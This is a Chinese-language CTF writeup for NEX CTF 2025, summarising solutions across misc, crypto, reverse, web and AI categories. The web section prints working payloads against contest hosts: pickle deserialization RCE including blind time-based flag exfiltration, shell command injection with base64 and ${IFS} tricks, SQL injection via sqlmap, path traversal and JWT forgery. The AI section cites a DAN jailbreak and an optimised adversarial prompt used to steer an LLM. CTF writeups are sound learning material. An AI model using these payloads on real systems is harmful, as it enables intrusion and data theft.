🚩 NEX CTF 2025 Writeup (feat. mfy)

由于这几天要打线下赛，也有些其他事情，因此没太多时间做题，Writeup 也写得很简略。不过，很多题我是当着出题人的面做的，因此简略一点应该也无所谓吧。

零、样题

✅【简单】Misc测试题

HEX 编码后的 flag 就在文档中，只是字体颜色改成了白色。全选，复制，解码，拿到答案。

✅【中等】機械の声

DAN 提示词。

✅ 挑战小仓鼠！&【困难】RRROTA机器人

Hackergame 2023 原题。我没有显卡，用 CPU 嗯跑了五个小时拿到提示词。

So Hiro join voices teammates visionChristimum nearing neighbour puck oill impatient island Brenda repe hourKimorfsw Tree hyJacob amused

~~什，怎么还有希罗酱的事~~

✅ Quantum compute

跟 AI 话聊了半天，得知量子计算题目可以用线性代数的矩阵乘法思想理解。最后参考那个有点人类不可读的文档，找到对应的逻辑门，完成了实验电路。

✅【用于测试Android环境】枫林鹿

用 JADX 反编译 classes.dex，发现 generateFakeFlag 方法和 decryptFlag 方法。

让 AI 写了个 Frida 脚本（需要科学上网）偷梁换柱，在控制台输出拿到 flag。

❌【中等】火柴人大作战

没看到题。电子竞技不需要视力。

✅【简单】Vigenère

维吉尼亚加密，已知 flag 前三位是 nex，爆破得出密码前三位 hap，再根据题面推测出密码是 happy。

☑️【简单】幻之衣

把附件拖进法国老女人里按了下 F5，直接得到解密函数的完整源码。感谢出题人现场给我拷的工具（？）

✅【简单】抓住小猫咪

F12 里看到游戏用 /get_time 接口获取了所需的时间，编辑并重发 /check 请求把时间改对即可。

其实这道题靠反应力也能做出来。

✅【中等】最终之战

就嗯凑。

max(range(1)) # 数字-1
len(set(str(range(int())))) # 10
len(set(str(int))) # 11
len(set(str(range))) # 12
len(str(int)) # 13
len(set(str(len))) # 14
len(str(range)) # 15
len(set(str(hex))) # 16
max(range(len(str(ord)))) # 22
len(str(ord)) # 23
len(str(open)) # 24
len(str(print)) # 25
ord(min(str(int))) # 32
ord(min(hex(int()))) # 48
max(range(ord(max(bin(int()))))) # 97
ord(max(bin(int()))) #98

F 70  chr(max(range(len(str(ord))))+ord(min(hex(int()))))
l 108 chr(ord(max(bin(int())))+len(set(str(range(int())))))
a 97  chr(max(range(ord(max(bin(int()))))))
g 103 chr(ord(max(bin(int())))+len(bin(len(bin(int()))))+len(chr(int())))
. 46  chr(len(str(len))+len(str(len)))
t 116 max(str(int))
x 120 max(hex(int()))

# payload：
next(open(
chr(max(range(len(str(ord))))+
ord(min(hex(int()))))+
chr(ord(max(bin(int())))+
len(set(str(range(int())))))+
chr(max(range(ord(max(bin(int()))))))+
chr(ord(max(bin(int())))+
len(bin(len(bin(int()))))+
len(chr(int())))+
chr(len(str(len))+
len(str(len)))+
max(str(int))+
max(hex(int()))+
max(str(int))))

✅【中等】PeekFlag

暴力出奇迹。

import subprocess as sp

chars = "1234567890{}-_=+qwertyuiopasdfghjklzxcvbnm!@#$%^&*()[]\\|~QWERTYUIOPASDFGHJKLZXCVBNM"
flag = list("?" * 32)

def try_once() -> int:
    result = sp.run(
        ["./peek.vmp.exe"],
        input="".join(flag),
        capture_output=True,
        text=True,
    )
    try:
        chars_correct = int(result.stdout.split()[-3])
    except Exception:
        print("found flag", "".join(flag))
        exit(0)
    return chars_correct

chars_correct = try_once()
idx = 0  # flag中的第n位
chars_idx = 0  # 尝试chars中的第n个字符

while chars_correct < 32:
    chars_idx = 0
    while chars_idx < len(chars):
        flag[idx] = chars[chars_idx]
        new_chars_correct = try_once()
        chars_idx += 1
        if new_chars_correct > chars_correct:
            chars_correct = new_chars_correct
            idx += 1
            print("".join(flag))
            break

print("".join(flag))

一、Misc / 取证

❌【重要】问卷 · 致所有参赛者

交太晚了，痛失三百分。

✅【简单】签到题

exiftool。

✅【简单】兽言兽语

搜索“兽音译者”解码附件中的密文，得到一个百度网盘链接。

下载加密的分卷压缩包和解密工具，解压得到一张 jpg。file 命令发现实则为 png，并且 IEND 块后面包含 zip 文件头。解压拿到 flag。

❌【简单】闪烁的实验室灯光

网不好没下完 kicad。没做。

✅【中等】奇思妙想聪明的小羊

图片后包含 zip 文件头，解压后得到一个 git 仓库。git checkout 355d7cf 拿到 flag。

✅【中等】来自中世纪的宝藏

解压附件后在 docProps 文件夹拿到 Medieval_nex.jpg。

在文档中发现白字密码 钥匙是NEEE_x，用 steghide 解码得到一个乱码文件名的文档。

mv $'\300'$'\356'$'\311'$'\361'$'\265'ı$'\246'$'\262'$'\330'.txt flag.txt

base64 解码得到 ark{LbH_sBhAQ_1v_FUra_ZRQvRINy_Ger4fHeR}，凯撒密码偏移量 -13 解码得到 flag。

✅ ctf怎么能少得了图寻呢

✅【简单】又见猎户座

StarLocator。

✅【简单】经典飞机照

在宁波周围对着高德卫星地图寻找图片中标志性的圈儿和发光的大桥，找到东海大桥和结果“滴水湖”。

✅ 数独

✅【简单】数独一

随便上网找个数独求解器得出答案。

✅【中等】数独二

不会写回溯算法，让 AI 写了个解题脚本（见链接）。DeepSeek 第一次立功。

✅ 重返东大1980

第一页左下角看见灰色 part1: nex{

第二页拉开自行车照片拿到 part2: fllistired_

第三页左上角批注 part3: flllikeLOL_

第四页备注 part4: flllookshenyang_

第五页母版 part5: fllcome_

声音: flag6: fllback}

第一个 flag 拼凑完毕。

第二个 flag 在 ppt 第四页，有一串神秘数字 663399 3243332 2288 442666 999666664 62

打开手机拨号盘，按照对应位置填入字母得到 flag 2: nex{dageda_bu_hao_yong_ma}

✅【简单】Pyyyyyyyyyyyyyyyyyyyython

第二道签到题，直接运行附件即可。

二、Crypto / 密码学

我完全不懂密码学，也没学过《信息安全数学基础》，这部分的题目全是靠 AI 做出来的。

✅【中等】Homo

把「提供一种用python实现的运算，这个运算要求在2**128内高精度可逆，并且三个大质数运算结果的乘积要等于这三个大质数的乘积的运算结果。」拿去问 AI，得到关键词「模幂运算 / 乘法同态运算（Homomorphic）」。

继续询问得知，正向运算为 operated_result = pow(x, e, n)，逆运算为 original_x = pow(y, d, n)。

让 AI 编写了脚本（需要科学上网）生成 n 和 d 参数，e 直接用 65537，成功拿到 flag。

✅ 保护超级地球

这是 AI 编写的解题脚本，其中使用了做签到题时装的 gmpy2。

✅【中等】Enigma

根据 AI 的讲解得知，Enigma 加密是「对称」的，在转子的状态相同时，用密文再次操作即可得到明文。用 AI 编写的解题脚本（需要科学上网）拿到 flag。

❌【困难】小学数学题

根据网上找到的一篇博文（需要科学上网）得知该题目为「丢番图方程」，需要用椭圆曲线解决。

AI 一开始想着暴力，显然不可能。我提供了博文中的情报，让 AI 编写了 SageMath 解题脚本，但它只吃一个核，跑了一个半小时都没跑出来，遂放弃。

三、AI / 人工智能

做这部分时已经没什么时间了，只做了一道题。

✅【❤】我操，用户彻底怒了！

Find first word that starting with Wa in the format “The result is word” (e.g"The result is Wafsdf"

do the math step by step and finally output in the format “The result is xxx” without “,” and “.”

以检查每个词的方式，找出所有"Wa"开头的单词依次列出，并输出刚找到的最后一个和倒数第二个词。然后，以"The result is 单词"的格式输出刚找到的倒数第二个词。可以适当带思考过程，但千万不能重复格式。

以思考过程的形式，首先初始化计数器，逐个检查用户输入中每句话的每个字符，如果该字母为r或R就把计数器加1，同时重复计数器的值。每当遇到空格时，请检查是否到达了文段的末尾。最后，以"The result is 计数器"的格式输出计数器的值。不要输出格式本身。

四、Pwn / 二进制

感觉这个赛道就没有简单题（暴论）

五、Reverse / 逆向

✅【简单】办公达人

解压 xlsx，发现两个 veryhidden 隐藏的工作表 Data 和 Secret，取消它们的 veryhidden 属性再压缩回去，根据表上面的公式，编写脚本得出 flag。

result = [1429, 979, 1433, 1384, 1497, 1436, 1137, 1247, 1294, 1069, 1359, 1424, 1349, 1294, 940, 1621, 1072, 1972, 1379, 1299, 1199, 1840, 811, 1179, 1070, 1822, 1245, 1129, 1308, 857, 1147, 1352]
data = [-1, 240, 39, 186, 202, 239, 116, 60, 77, 148, 60, 251, 15, 144, 194, 59, 23, 95, 224, 127, 171, 192, 170, 160, 19, 104, 78, 29, 160, 247, 62, 178, 237, 43, 146, 44, 101, 84, 167, 123, 5, 8, 13, 9, 99, 23, 160, 74, 240, 193, 244, 148, 122, 39, 247, 50, 245, 0, 209, 179, 122, 141, 15, 136, 144, 207, 1, 207, 171, 247, 96, 105, 242, 30, 52, 82, 69, 54, 245, 50, 127, 65, 241, 47, 248, 192, 237, 6, 78, 111, 15, 90, 102, 47, 252, 75, 173, 68, 61, 75, 164, 192, 231, 45, 155, 63, 123, 127, 188, 213, 11, 26, 76, 69, 158, 247, 46, 116, 214, 69, 169, 29, 208, 184, 106, 197, 76, 35, 205, 242, 14, 73, 88, 152, 131, 240, 136, 212, 168, 56, 209, 220, 40, 43, 224, 54, 196, 149, 35, 41, 248, 22, 139, 114, 220, 117, 145, 55, 72, 55, 119, 65, 59, 113, 208, 101, 126, 218, 66, 67, 132, 36, 139, 51, 149, 141, 194, 125, 43, 177, 223, 200, 157, 162, 126, 214, 250, 58, 224, 110, 56, 176, 51, 153, 142, 106, 19, 16, 30, 18, 80, 246, 215, 236, 242, 195, 154, 103, 122, 128, 155, 241, 107, 58, 11, 16, 9, 177, 244, 175, 97, 80, 100, 181, 137, 98, 205, 221, 41, 130, 172, 193, 58, 83, 105, 55, 14, 114, 126, 225, 145, 169, 220, 0, 206, 102, 138, 137, 181, 107, 144, 123, 27, 198, 19, 111, 2, 4, 193, 113, 27, 162, 111, 14, 137, 196, 1, 174, 232, 41, 139, 36, 142, 95, 181, 132, 16, 51, 100, 53, 8, 108, 151, 71, 22, 185, 142, 6, 37, 231, 50, 207, 240, 87, 177, 34, 196, 176, 105, 249, 135, 209, 7, 88, 249, 9, 240, 38, 58, 139, 223, 59, 140, 28, 208, 186, 91, 15, 30, 161, 122]
o = ""

for i in range(32):
    o += chr(
        result[i]
        - (
            data[1 + i]
            + data[33 + i]
            + data[65 + i]
            + data[97 + i]
            + data[129 + i]
            + data[161 + i]
            + data[193 + i]
            + data[225 + i]
            + data[257 + i]
            + data[289 + i]
        )
    )


print(o)

另外，手机自带的 Excel 预览程序能直接看到 veryhidden 的工作表，算是一个非预期解。

✅【简单】ObfuMaze

这道题使用 jsfuck 混淆。上网找了一个解混淆工具，发现迷宫就存在 MAZE 常量中，操作一下就可以得到 flag。

本题难点应该在需要 Node.js 环境？很多小登没有环境就放弃了。

六、Web / 网站与应用程序

✅【简单】签到

第一个 flag 碎片在隐藏的 <input> 里，之后跟着提示一步步走就能拿到完整 flag。

✅【简单】puzzle

这道题应该已经不算简单了（

F12 找到题目主逻辑 puzzle.js，经过了极其高强度的混淆。

发现一个 checkIfFinish 函数看着像是判断是否打完的，于是我把整个题目下载到本地，把该函数改成 return true，就这样简单粗暴地成功拿到 flag。

✅【简单】校园福利中心

这道才是真简单。

F12 发现请求头中有 X-Can-View: no，编辑并重发改为 yes 拿到 flag。

✅【简单】简易签名的 VIP 计划

题目本身不算「简单」，但加上提示确实零基础的人用 AI 也能做了。怀疑是凑简单题数量（

import requests
import base64
import json
import time

def base64uri_encode(i):
    data = base64.b64encode(i.encode()).decode()
    return data.replace("+", "-").replace("/", "_").rstrip("=")

base = "http://ulkdfdhpcjabhewe.neu-nex.fun"

res = requests.post(
    base + "/api/login",
    data='{"username":"admin","password":"123456"}',
    headers={"Content-Type": "application/json"},
)

initial_jwt = res.json()["token"].split(".")

jwt_part1 = initial_jwt[0]
jwt_part2 = initial_jwt[1]

login_info = json.loads(base64.b64decode(jwt_part2.encode()).decode())

print(login_info)

j = (
    '{"username":"admin","to":"admin","amount":-100000000,"iat":'
    + str(login_info["iat"])
    + ',"action":"transfer"}'
)

j_b64 = base64uri_encode(j)
req_part2 = jwt_part1 + "." + j_b64 + ".secret123"
jwt = jwt_part1 + "." + j_b64 + "." + base64uri_encode(req_part2)

res = requests.post(
    base + "/api/transfer",
    data='{"from":"admin","to":"admin","amount":-100000000}',
    headers={"Content-Type": "application/json", "Authorization": "Bearer " + jwt},
)

print(res.json())

✅【中等】NEX文档站

先用 sqlmap 工具花了两个小时「睡」出用户名密码为 admin / admin123：

sqlmap -u http://w0eu0io2cqmqgpyh.neu-nex.fun/login
  --data 'username=admin&password=123456'
  --dump --time-sec 1 -D ctf_docs 
  -T users -C username,password

根据提示，题目存在路径穿越漏洞，于是直接拿到 flag。

http://dwdofjrxzusuxq13.neu-nex.fun/book/..%2Fflag.txt（草）

所以我还是不会 SQL 注入…

✅【中等】世界时钟

F12 抓个请求发现程序是通过 POST date 命令来获取当前准确时间的。

先 ls：printf 'bHM='|base64 -d|sh

Dockerfile
app.py
docker-compose.yml
hint
requirements.txt
static
templates

之后 cat hint：printf 'Y2F0IGhpbnQ='|base64 -d|sh

1	flag in env

直接 export 拿到 flag。

✅【中等】老虎机

看到有的小登用 AI 做这道题，结果 AI 以为用户在读博结果拒绝输出 … 草。

稍微读了下代码，本以为这道题是要用某种方式攻击 RNG 使其产生四个一样的输出，结果我想复杂了。直接按照 FlagClient.js 里的 API 请求格式发一下 /api/flag/claim 就拿到 flag 了 … 更草了。

✅ BanG Dream！

✅【简单】It’s MyGo!!!

还在 go，还在 go。

第一问看了下源码，禁止的命令中没有 tac，直接使用。

curl -X POST 'http://hcbnlhlw9cp2fgcr.neu-nex.fun/?mygo=ls'
  -d 'mujica=mfy' 2>/dev/null | grep mfy -A 10
          <p>诶，你也喜欢mfy吗，那看来我们是同好了，Dockerfile
docker-compose.yml
go.mod
hint.txt
main.go
templates
</p>

curl -X POST 'http://hcbnlhlw9cp2fgcr.neu-nex.fun/?mygo=tac%20hint.txt'
  -d 'mujica=mfy' 2>nul | grep mfy
<p>诶，你也喜欢mfy吗，那看来我们是同好了，flag在环境变量里</p>

curl -X POST 'http://hcbnlhlw9cp2fgcr.neu-nex.fun/?mygo=export'
  -d 'mujica=mfy' 2>nul | grep mfy -A 10
<p>诶，你也喜欢mfy吗，那看来我们是同好了，export FLAG=&#39;nex{8An9dr3Am_17&#39;&#34;&#39;&#34;&#39;s_mY9Odselvntn}&#39;
export GOPATH=&#39;/home/appuser/go&#39;
export HOME=&#39;/home/appuser&#39;
export HOSTNAME=&#39;dc4cdf58bdb2&#39;
export PATH=&#39;/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/home/appuser/go/bin&#39;
export PWD=&#39;/app&#39;
</p>

这个转义字符有点恶心，有一些多余的引号。解出来是 nex{8An9dr3Am_17's_mY9Odselvntn}。

✅【中等】Ave Mujica

我说这是困难题。

题目禁止 mygo 参数里使用空格，于是搜索到这篇回答（需科学上网）：

If only there was a variable whose value is a space… Or more generally, contains a space.

cat${IFS}file.txt

The default value of IFS is space, tab, newline. All of these characters are whitespace. If you need a single space, you can use ${IFS%??}.

import requests

base = "http://f9tlu5ipm22y6r2r.neu-nex.fun/"

res = requests.post(
    base + "?mygo=export|tee${IFS}templates/index.html",
    data="mujica=mfy",
    headers={"Content-Type": "application/x-www-form-urlencoded"},
)

题目环境可写，不需要过于复杂的重定向输出。运行脚本然后刷新网页即可。

✅ 神秘黑客的挑衅

✅【简单】公开的秘密

dig TXT rota.neu-nex.fun。

✅【中等】扭曲的镜像

确实是已知问题（

✅【困难】变形的钥匙

Python 的 base64 模块，遇到俩等于号就会直接认为是字符串结束，不再往后解码，而 coreutils 的会。

echo $(printf '8.8.8.8'|base64)$(printf ';cat /flag'|base64)
OC44LjguOA==O2NhdCAvZmxhZw==

printf 'OC44LjguOA==O2NhdCAvZmxhZw=='|base64 -d
8.8.8.8;cat /flag

>>> base64.b64decode(b'OC44LjguOA==O2NhdCAvZmxhZw==')
b'8.8.8.8'

完美。编辑并重发，把得到的 payload 发进去即可拿到 flag。

✅ 逆流：数据迷踪

✅【简单】第一次接触：咖啡店的暗号

直接 cat contact.pkl。

✅【中等】深入虎穴：配置指令的漏洞

https://rizqimulki.com/python-security-pickle-deserialization-and-remote-code-execution-6561781e1efa

import pickle

class ConfigMaster:
    def __reduce__(self):
        return (exec,(
            "import subprocess as sp;"
            'raise ValueError(sp.check_output(["cat","/flag"],text=True))',
        ))

obj = ConfigMaster()
with open("1.pkl", "wb") as f:
    f.write(pickle.dumps(obj))

✅【困难】终极对决：静默任务执行

没有回显，我直接进行一个觉的睡，补充一下这几天缺失的睡眠。

import pickle
import requests
from io import BytesIO
import time
import math

upload_api = 'http://sd11d3824zr1dbfz.neu-nex.fun/upload'

class NexNet:
    def __reduce__(self):
        return (exec, (
          'import time; flag=open("/flag").read();'
          'time.sleep(ord(flag[0])-32)',
        ))

obj = NexNet()
pkl = pickle.dumps(obj)

start_time = time.perf_counter()
response = requests.post(upload_api, files={
    'mission_file': ('2.pkl', BytesIO(pickle.dumps(obj)), 'application/octet-stream')
})
end_time = time.perf_counter()

print(math.floor(end_time-start_time))
print(chr(math.floor(end_time-start_time)+32))

写完这个手动拿第一位的脚本，确认确实能拿到第一位 n 之后，vibe 了一个自动化的版本。趴桌子上睡了一觉，醒来就拿到 flag 了。

https://chat.deepseek.com/share/i426gpkt92vbdyx02q

七、Quantum / 量子计算

依旧线性代数，感谢 Gemini 老师的悉心教导。

补充定义：

(X)：“张量积”，给第一个向量的每一个元素，乘以第二个完整的向量

|00> = |0> (x) |0>
= [1 0]^T (x) [1 0]^T
= [1 0 0 0]^T

同理

|11> = |1> (x) |1>
= [0 1]^T (x) [0 1]^T
= [0 0 0 1]^T



归一化：线代“施密特正交化”里所用过的操作，把向量长度变为1


|00> + |11>
= 归一化（[1 0 0 0]^T + [0 0 0 1]^T）
= 归一化（[1 0 0 1]^T）
= [根号2/2, 0, 0, 根号2/2]


使用量子计算解决这个线代问题
(1)
CNOT (CX) 受控门
1 0 0 0
0 1 0 0
0 0 0 1
0 0 1 0

(2)
H 哈德玛门（用于制叠加态）
H = 根号2/2  [1 1]
            [1 -1]

初始值：
|00> = [1 0 0 0]^T

而H门不能应用于四位向量，需要先对I门（对角矩阵[1 0],[0 1]）做张量积

结果为 根号2/2 乘
1 0 1 0
0 1 0 1
1 0 -1 0
0 1 0 -1

再乘以 |00>
= 根号2/2 [1 0 1 0]^T

再用CNOT门去乘

结果为 根号2/2 [1 0 0 1]^T 即为所求

qc = QuantumCircuit(2)
qc.h(0) # 第1位应用I门，即上面的张量积运算
qc.cnot(0, 1)

AI教的。

本文采用署名-非商业性使用-相同方式共享 4.0 国际许可协议，转载请注明出处。